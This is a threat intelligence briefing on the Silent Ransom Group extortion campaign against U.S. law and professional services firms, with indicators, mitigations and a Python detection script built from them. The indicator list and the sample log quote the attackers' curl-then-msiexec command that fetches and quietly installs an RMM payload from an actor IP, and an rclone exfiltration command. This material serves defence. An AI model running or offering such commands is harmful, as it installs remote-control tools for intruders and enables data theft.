The threat actor known as Silent Ransom Group (UNC3753, also referred to as Luna Moth) is conducting high-tempo extortion campaigns against U.S. law and professional services firms. The attack chain uses spearphishing and vishing (T1566.004) to trick personnel into installing Remote Monitoring and Management (RMM) tools such as AnyDesk and SuperOps. The attackers then pivot from compromised BYOD endpoints into corporate Virtual Desktop Infrastructure (VDI), including Windows 365 and Citrix environments. Once inside, the group performs surgical data harvesting from document management systems like iManage, targeting PII and tax logs. The campaign is characterized by rapid execution, often completing the full lifecycle within a single business day, and includes physical USB-based exfiltration.

  • Incident Overview: Rapid Extortion Lifecycle

    • Target Verticals: U.S.-based legal, financial, and professional services.
    • Operational Tempo: Highly aggressive; data theft can be initiated in under one hour.
    • Primary Objective: Exfiltration of sensitive client data followed by unbranded extortion via the 'LEAKEDDATA' site.
  • Attack Vector: Social Engineering and RMM Abuse

    • Initial Access: Low-friction invoice-themed emails followed by vishing (voice phishing) impersonating internal IT support.
    • Tool Deployment: Coercion of victims into hosting screen-sharing sessions via Zoom, Teams, or Quick Assist to install RMM tools (AnyDesk, Zoho Assist, SuperOps).
    • Lateral Movement: Pivoting from compromised BYOD (Bring Your Own Device) endpoints into protected corporate VDI (Windows 365/Citrix) environments.
    • Physical Intrusion: Deployment of actors posing as technicians to exfiltrate data via physical USB drives (T1052.001).
  • Data Exfiltration: Surgical Document Harvesting

    • Targeting Methodology: Keyword-based searches within document management systems like iManage to identify high-value targets.
    • Stolen Data Types: PII, SSNs, tax logs (W-2, W-9, 1099), and proprietary corporate client agreements.
    • Exfiltration Tools: Heavy reliance on Rclone, WinSCP, and Privnote for link delivery and cloud-based staging.
  • Indicators of Compromise (IoCs)

    • Network Indicators: 192.236.147.131, 192.236.147.138, 193.141.60.212, 192.236.154.158, 192.236.146.173, 174.169.162.62, 64.94.84.97.
    • Domain Patterns: <organization>-itdesk.com, <organization>-it.com, <organization>-helpdesk.com.
    • Execution Command: curl -sL "http://[actor-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet.
    • Data Leak Site: business-data-leaks[.]com.
  • Defensive Strategy and Mitigation

    • Access Hardening: Implement strict Zero Trust and conditional access policies to prevent unauthorized BYOD-to-VDI pivoting.
    • Endpoint Monitoring: Alert on unauthorized RMM software installations and anomalous mass file access within Document Management Systems (DMS).
    • Physical Security: Enforce strict USB port controls and mandate identity verification for all onsite technical personnel.
    • Awareness Training: Deploy specialized training focused on detecting sophisticated vishing and IT impersonation tactics.
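The IoC list and the endpoint-monitoring recommendation above translate directly into detection logic. The following is an added example, not code from the briefing or from any vendor: it applies the listed actor IPs, the leak-site domain, the <organization>-itdesk/-it/-helpdesk lookalike pattern, the curl-plus-msiexec installer one-liner, and the named RMM and exfiltration tools to a stream of endpoint telemetry. The key=value log format, host and user names, the "approved RMM" allowlist and the organization brand list are all constructed assumptions; the sample lines embed one of the listed actor IPs as the installer download host.

```python
import re
from dataclasses import dataclass

# Indicators taken from the briefing. Everything else (log format, host names,
# the approved-tool list, the org brand list) is a constructed assumption.
ACTOR_IPS = {
    "192.236.147.131", "192.236.147.138", "193.141.60.212", "192.236.154.158",
    "192.236.146.173", "174.169.162.62", "64.94.84.97",
}
LEAK_SITE = "business-data-leaks.com"
RMM_PRODUCTS = ("anydesk", "zoho assist", "superops")   # RMM tools named in the briefing
EXFIL_TOOLS = ("rclone", "winscp")                      # exfil tools named in the briefing

# <organization>-itdesk.com / -it.com / -helpdesk.com lookalike pattern.
LOOKALIKE_DOMAIN = re.compile(r"^(?P<org>[a-z0-9-]+?)-(itdesk|it|helpdesk)\.com$", re.I)
# The installer one-liner from the IoC list: curl download of /installer, then a quiet msiexec.
RMM_INSTALL_CMD = re.compile(
    r'curl\s+-sL\s+"?http://[^\s"]+/installer"?\s+-o\s+"?[^\s"]+\.msi"?'
    r'\s*&&\s*msiexec\s+/i\s+"?[^\s"]+\.msi"?\s+/quiet', re.I)
URL_HOST = re.compile(r'https?://([^/\s"]+)', re.I)
# Assumed log format: space-separated key=value pairs; values containing spaces are double-quoted.
KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass
class Alert:
    rule: str
    host: str
    detail: str


def parse_line(line):
    """Turn one key=value log line into a dict (constructed format, see above)."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in KV.finditer(line)}


def evaluate(fields, org_names=frozenset(), approved_rmm=frozenset()):
    """Apply the briefing's indicators to one parsed event and return any alerts."""
    alerts = []
    host = fields.get("host", "?")
    event = fields.get("event")
    if event == "process_create":
        cmd = fields.get("cmd", "")
        low = cmd.lower()
        if RMM_INSTALL_CMD.search(cmd):
            alerts.append(Alert("srg_rmm_installer_cmd", host, cmd))
        # The actor IP may appear as the download host inside the command line itself.
        for h in URL_HOST.findall(cmd):
            if h in ACTOR_IPS:
                alerts.append(Alert("srg_actor_ip", host, h))
        for tool in RMM_PRODUCTS:
            if tool in low and tool not in approved_rmm:
                alerts.append(Alert("unapproved_rmm_tool", host, tool))
        for tool in EXFIL_TOOLS:
            if tool in low:
                alerts.append(Alert("exfil_tool", host, tool))
    elif event == "dns":
        query = fields.get("query", "").lower()
        if query == LEAK_SITE:
            alerts.append(Alert("srg_leak_site_lookup", host, query))
        m = LOOKALIKE_DOMAIN.match(query)
        # Fire only when the left-hand label is one of our own brand names;
        # alerting on every "-it.com" domain is far too noisy in practice.
        if m and m.group("org") in org_names:
            alerts.append(Alert("it_helpdesk_lookalike_domain", host, query))
    elif event == "net":
        dst = fields.get("dst", "")
        if dst in ACTOR_IPS:
            alerts.append(Alert("srg_actor_ip", host, dst))
    return alerts


def scan(lines, org_names=frozenset(), approved_rmm=frozenset()):
    """Run evaluate() over every log line and collect the alerts in order."""
    alerts = []
    for line in lines:
        alerts.extend(evaluate(parse_line(line), org_names, approved_rmm))
    return alerts


# Constructed sample telemetry; the download host on the second line is a listed actor IP.
SAMPLE_LOG = r"""
ts=2024-01-01T09:12:03Z host=LAPTOP-17 user=jdoe event=dns query=contoso-itdesk.com
ts=2024-01-01T09:14:51Z host=LAPTOP-17 user=jdoe event=process_create cmd="cmd.exe /c curl -sL http://192.236.147.138/installer -o SuperOps.msi && msiexec /i SuperOps.msi /quiet"
ts=2024-01-01T09:15:20Z host=LAPTOP-17 user=jdoe event=net dst=192.236.147.131 dport=443
ts=2024-01-01T09:20:00Z host=LAPTOP-17 user=jdoe event=process_create cmd="C:\Program Files\AnyDesk\AnyDesk.exe"
ts=2024-01-01T10:02:11Z host=FILESRV-02 user=svc_backup event=process_create cmd="rclone.exe sync D:\iManage remote:staging"
ts=2024-01-01T10:05:00Z host=DESK-04 user=asmith event=dns query=mail.example.com
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.strip().splitlines(), org_names={"contoso"}):
        print(f"[{a.rule}] host={a.host} {a.detail}")
```

The two tunables matter more than the static indicators: approved_rmm suppresses the tools your own IT staff legitimately deploy, and org_names keeps the lookalike-domain rule focused on the brands an impersonator would actually register. Static IPs rotate quickly, so treat the IP matches as a confirmation signal and the command-line and DMS-access rules as the ones to rely on.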
